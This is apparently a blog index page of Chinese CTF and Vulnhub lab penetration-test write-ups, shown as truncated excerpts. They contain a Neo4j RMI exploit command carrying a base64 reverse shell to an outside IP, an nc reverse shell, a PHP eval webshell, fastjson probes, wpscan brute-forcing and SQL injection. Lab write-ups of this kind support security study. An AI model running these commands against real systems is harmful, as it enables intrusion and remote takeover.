晴川's Blog🌈

春秋云境Timeflag01端口扫描 7687和7474是neo4j，直接找cve https://github.com/zwjjustdoit/CVE-2021-34371.jar?tab=readme-ov-file 1java -jar rhino_gadget.jar rmi://39.99.224.197:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" 提示了kerberos flag02将fscan，frp下载到靶机 服务器python起http服务就行 123python3 -m http.server 8080wget http://101.34.80.152:8080/frpc.ini 查看ip 1234172.22.6.12 域控172.22.6.25 域内机器172.22.6.36 当前机 ...

fastjson1268 jdbc打mysql登录页面抓包发现极有可能是fastjson 尝试一下测试版本号 12{ "@type": "java.lang.AutoCloseable" 1.2.68版本下一个简单粗暴地就是打jdbc+mysql 但是要求环境中存在JDBC的依赖，且对版本的要求也挺严格。 Mysql-JDBC在5、6、8下都存在相应的利用，所以就需要探测具体是什么版本。 123com.mysql.jdbc.Buffer //mysql-jdbc-5com.mysql.cj.api.authentication.AuthenticationProvider //mysql-connect-6com.mysql.cj.protocol.AuthenticationProvider //mysql-connect-8 123456{ "x": { "@type": "java.lang.Character"{ ...

打靶-Miouche前言kali：192.168.0.106 靶机IP:192.168.0.109 难度：中等 这次打靶机前了解到一个新工具TSCAN，那这个靶场来测试一下新工具的使用 渗透过程首先，打开靶机就给了IP,我直接就用工具扫了 指纹显示是Wordperss 本来我还在找相应的漏洞，但是我万万没想到有相应的插件，kali还自带wpscan 1wpscan --url http://192.168.0.109 -e u,p 扫到用户名为Kitty 尝试爆破密码 1wpscan --url http://192.168.0.109 -U kitty -P ./rockyou.txt 字典太大了，扫了好久没扫出来 换一种方式，使用插件尝试 1wpscan --url http://192.168.0.109 -e u,p --plugins-detection mixed 扫到一个插件iwp-client 访问相关url http://192.168.0.109/wp-content/plugins/iwp-client/readme.txt 去msf查找相关漏洞 1 ...

春秋云境-Initial信息搜集先扫描 22和80 渗透利用 连蚁剑， sudo -l 发现mysql具有root权限 flag01拿到flag1 查看内网ip 上fscan开扫 开的够多的 1234172.22.1.2 DC 172.22.1.21 MS17-010 172.22.1.18 信呼OA flag02接下来先打信呼OA，我们接下来上传frp到主机上，让内网的流量转发出来。 先打信乎OA 弱口令可以爆破，但是环境容易爆，谨慎 admin/admin123 进后台发现版本是V2.28 当前目录建一个1.php 1<?php eval($_POST["1"]);?> exp 12345678910111213141516171819202122232425262728293031import requestssession = requests.session()url_pre = 'http://172.22.1.18/'url1 = url_pre + '?a=check&am ...

打靶-CengBox前言kali IP:192.168.131.28 靶机IP:192.168.131.243 Difficulty : beginner/intermediate 渗透过程1arp-scan-l 1nmap -sV 192.168.131.243 -A 就22和80,看来这个靶机难度不是很高 先扫扫目录 1dirb http://192.168.131.243 /usr/share/wordlists/dirb/big.txt 扫到了masteradmin 继续扫一下masteradmin 1dirb http://192.168.131.243 -X .php 扫描到3个，db.php访问为空，访问upliads.php会跳转到login.php 页面存在sql注入,万能密码可登录 1admin'or 1=1# 登陆成功，进入文件上传，但没有反应 回去前面的sql注入 sqlmap抛出admin密码 1masteradmin/C3ng0v3R00T1! 出题人好阴险，登上admin上传文件还是没反应，我以为有问题 查看源码 ...

打靶-Cybox前言kali IP：192.168.0.112 靶机IP :192.168.0.113 Difficulty: Medium Objective: Get user.txt and root.txt 中途没理清代理怎么搞的 第二天来做ip换了 kali：192.168.131.28 靶机：192.168.131.132 渗透过程端口探测 看这样子入口点还是80web页面 扫扫目录 发现存在phpmyadmin但只允许127.0.0.1访问 assets下也都是些css或js文件 Contact: admin@cybox.company web页面最下脚发现有这个联系方式， 扫了半天没啥发现啊也，看这些端口不应该啊 实属没思路了，看看wp了 域名cybox.company，我们将其添加进hosts文件，尝试再次扫描一下 1vim /etc/hosts 后面用gobuster扫描，一款基于go语言的目录/文件和DNS爆破工具，可以对目录、文件、DNS和VHost等对象进行暴力破解攻击，下载链接https://github.com/OJ/gobuster，k ...

打靶-My cmscms前言靶机ip:192.168.0.109 kali IP：192.168.0.106 Goal: Get the root flag of the target. 渗透过程TScan扫描一下 先看80，好熟悉的界面，以前NKCTF做过，先去看看以前的题，记得当时是个后台文件上传RCE 尝试密码无果，去测试一下mysql有没有弱密码 好家伙直接弱密码 1mysql -uroot -p -h 192.168.0.109 包意思，中途连sql不知道咋了虚拟机炸了，直接换了一个 fb67c6d24e756229aab021cea7605fb3 本来想直接MD5解密网站偷懒，没想到不行，只能换一种方法了，更改密码 网上应该会有用这个cms忘记密码改密码的过程 果然，直接改为123456 1update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask&# ...

打靶-broken前言靶机IP: 192.168.131.111 kali IP: 192.168.131.28 难度：中等 beginner for user flag and intermediate for root flag. 渗透过程扫ip 扫端口 经典端口 直接上web页面看看 一个页面开始啥也没发现 dirsearch扫的 或者 1nikto -h 192.168.131.111 后面看到有cms页面提示flag1 对该路径继续扫描 扫到/cms/cc 发现会进行访问数据包 尝试nc监听发现，他会访问特定的文件 43793a49a637e7c76861f4aa46e6cdb9.sh sh文件，可以执行脚本文件，尝试在本地的这个文件中写入命令 1systemctl start nginx 先启动nginx， 1echo "nc 192.168.131.28 9999 -e /bin/bash">43793a49a637e7c76861f4aa46e6cdb9.sh 反弹到shell 一顿乱翻，发现在index. ...

打靶-Breakout前言靶机地址Vulnhub-EMPIRE: BREAKOUT kali 攻击机ip：192.168.31.215 靶机 ip：192.168.31.26 渗透过程此次靶机打开就给ip了，也不用去发现靶机ip了 直接看看端口吧 1nmap -sV 192.168.31.26 -A 可以看到这次开放的端口有 80 139 445 10000 20000 老规矩，先看看80 查看源代码发现这么一串 1234567<!--don't worry no one will get here, it's safe to share with you my access. Its encrypted :)++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++ ...

打靶-typo1前言环境地址：https://www.vulnhub.com/entry/typo-1,472/ kali IP：192.168.131.28 目的机ip :192.168.131.82 渗透过程老规矩 虽然靶机给了ip，流程还是要走走的 1arp-scan -l 123nmap -sV -A 192.168.131.82sudo nmap -sS -sV -sC -p- 192.168.131.82-oN nmap_full_scannmap -A -v -sV -T5 -p- --script=http-enum 192.168.131.82 访问80端口发现是typo3cms 但是pagenotfound dirsearch扫描发现了INSTALL.md文档， 通过查看其中的网址来看 安装更新路径在typo3/install.php 发现登录被锁 访问index.php 发现了登录界面，尝试了几个弱密码发现失败 尝试一下其他端口，8080一个hello发现没啥，8081是phpmyadmin/ root root直接登录成功 我 ...